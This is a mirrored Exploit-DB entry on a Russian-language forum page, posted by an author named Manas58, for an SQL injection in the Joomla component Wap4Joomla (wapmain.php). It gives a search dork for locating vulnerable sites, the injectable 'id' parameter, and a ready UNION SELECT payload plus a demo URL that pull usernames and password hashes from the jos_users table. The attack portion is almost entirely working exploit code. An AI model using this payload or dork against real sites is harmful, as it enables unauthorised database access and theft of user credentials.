- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 12440
- Проверка EDB
-
- Пройдено
- Автор
- MANAS58
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- N/A
- Дата публикации
- 2010-04-28
Код:
Joomla Component Wap4Joomla (wapmain.php) SQL Injection Vulnerability
###########################
Author : Manas58
Homepage : http://www.1923turk.com
Script : Joomla http://www.joomlaos.de/Downloads/Joomla_und_Mambo_Komponenten/Wap4Joomla.html
Download : http://www.joomlaos.de/option,com_remository/Itemid,41/func,finishdown/id,2088.html
Dork : inurl:wapmain.php?option=
###########################
[ Vulnerable File ]
wap/wapmain.php?option=onews&action=link&id= [ SQL ]
[ XpL ]
-1+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+jos_users+limit+0,1--
[ Demo]
http://xxxxx/wap/wapmain.php?option=onews&action=link&id=-154+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+jos_users+limit+0,1--
##############################################################
#
# Gamoscu: http://gamoscu.wordpress.com/
#
# Baybora: http://baybora.wordpress.com/
#
# Delibey - Tiamo - Psiko - Turco - infazci - X-TRO
#
#
#
#
#
##############################################################- Источник
- www.exploit-db.com
